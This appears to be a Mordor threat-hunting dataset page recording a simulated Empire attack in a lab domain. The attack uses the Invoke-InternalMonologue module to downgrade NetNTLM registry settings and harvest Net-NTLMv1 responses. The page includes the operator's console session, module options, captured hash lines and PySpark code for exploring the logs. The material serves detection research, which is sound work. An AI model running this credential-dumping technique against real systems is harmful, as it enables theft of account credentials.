Empire Invoke InternalMonologue

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/12/25

Modification Date

2020/09/21

Tactics

[‘TA0005’]

Techniques

[‘T1112’]

Tags

[‘Registry Modification’, ‘Windows Registry NetNTLM settings’, ‘Downgrade’]

Dataset Description

This dataset represents adversaries downgrading the challenge/response authentication protocol used for network logons, the minimum security negotiated for applications using NTLMSSP, and security settings that restrict outgoing NTLM traffic to remote servers in an environment

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Threat Hunter Playbook

Extended NetNTLM Downgrade

https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-191224222300.html

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

invoke_internal_monologue

Adversary View

(Empire: XFLEZM9N) > usemodule credentials/invoke_internal_monologue*
(Empire: powershell/credentials/invoke_internal_monologue) > info

            Name: Invoke-InternalMonologue
            Module: powershell/credentials/invoke_internal_monologue
        NeedsAdmin: True
        OpsecSafe: False
        Language: powershell
MinLanguageVersion: 2
        Background: False
OutputExtension: None

Authors:
@eladshamir
@4lex

Description:
Uses the Internal Monologue attack to force easily-
decryptable Net-NTLMv1 responses over localhost and without
directly touching LSASS.
https://github.com/eladshamir/Internal-Monologue

Comments:
The underlying powershell function accepts switches that
[DISABLE] default behaviours. The default settings will
downgrade NetNTLM responses to v1, impersonate all users,
use challenge 1122334455667788 and restore the registry to
its original state. Set the options in this module to True
in order to DISABLE the behaviours Disabling Downgrade and
Impersonation yields higher OPSEC, but less than ideal loot

Options:

Name        Required    Value                     Description
----        --------    -------                   -----------
Agent       True        XFLEZM9N                  Agent to use for InternalMonologue      
Challenge   True        1122334455667788          Net-NTLM Challenge to send              
Downgrade   False                                 DISABLE downgrading to allow Net-NTLMv1 
                                                    responses                               
Impersonate False                                 DISABLE user impersonation and fetch    
                                                    only current user                       
Restore     False                                 DISABLE restoring the registry setting  
                                                    that allowed v1 responses               
Verbose     False                                 Verbose                                 

(Empire: powershell/credentials/invoke_internal_monologue) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked XFLEZM9N to run TASK_CMD_WAIT
[*] Agent XFLEZM9N tasked with task ID 2
[*] Tasked agent XFLEZM9N to run module powershell/credentials/invoke_internal_monologue
(Empire: powershell/credentials/invoke_internal_monologue) > pgustavo::shire:6c5a5d82ec8bf7d84989d0876cdfe1b57a0019b72517ca9f:6c5a5d82ec8bf7d84989d0876cdfe1b57a0019b72517ca9f:1122334455667788
IT001$::shire:cf1dd7f62b7394958df43c8bbdff4888495a7e572a359017:cf1dd7f62b7394958df43c8bbdff4888495a7e572a359017:1122334455667788

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/defense_evasion/host/empire_monologue_netntlm_downgrade.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+-----------------+----------------------------------------+-------+-----+
|Hostname         |Channel                                 |EventID|count|
+-----------------+----------------------------------------+-------+-----+
|IT001.shire.com  |Microsoft-Windows-Sysmon/Operational    |10     |825  |
|IT001.shire.com  |Windows PowerShell                      |800    |149  |
|IT001.shire.com  |Microsoft-Windows-PowerShell/Operational|4103   |123  |
|ACCT001.shire.com|Microsoft-Windows-Sysmon/Operational    |7      |63   |
|IT001.shire.com  |security                                |4658   |48   |
|ACCT001.shire.com|Microsoft-Windows-Sysmon/Operational    |10     |30   |
|HR001.shire.com  |Microsoft-Windows-Sysmon/Operational    |10     |28   |
|IT001.shire.com  |security                                |5158   |27   |
|IT001.shire.com  |security                                |5156   |27   |
|IT001.shire.com  |Microsoft-Windows-Sysmon/Operational    |3      |25   |
|IT001.shire.com  |security                                |4656   |24   |
|IT001.shire.com  |Microsoft-Windows-Sysmon/Operational    |12     |24   |
|IT001.shire.com  |security                                |4690   |24   |
|FILE001.shire.com|Microsoft-Windows-Sysmon/Operational    |3      |22   |
|FILE001.shire.com|Security                                |5156   |22   |
|HFDC01.shire.com |Security                                |5156   |20   |
|FILE001.shire.com|Security                                |5158   |20   |
|HFDC01.shire.com |Microsoft-Windows-Sysmon/Operational    |3      |18   |
|HFDC01.shire.com |Microsoft-Windows-Sysmon/Operational    |10     |13   |
|HFDC01.shire.com |Security                                |5158   |11   |
+-----------------+----------------------------------------+-------+-----+
only showing top 20 rows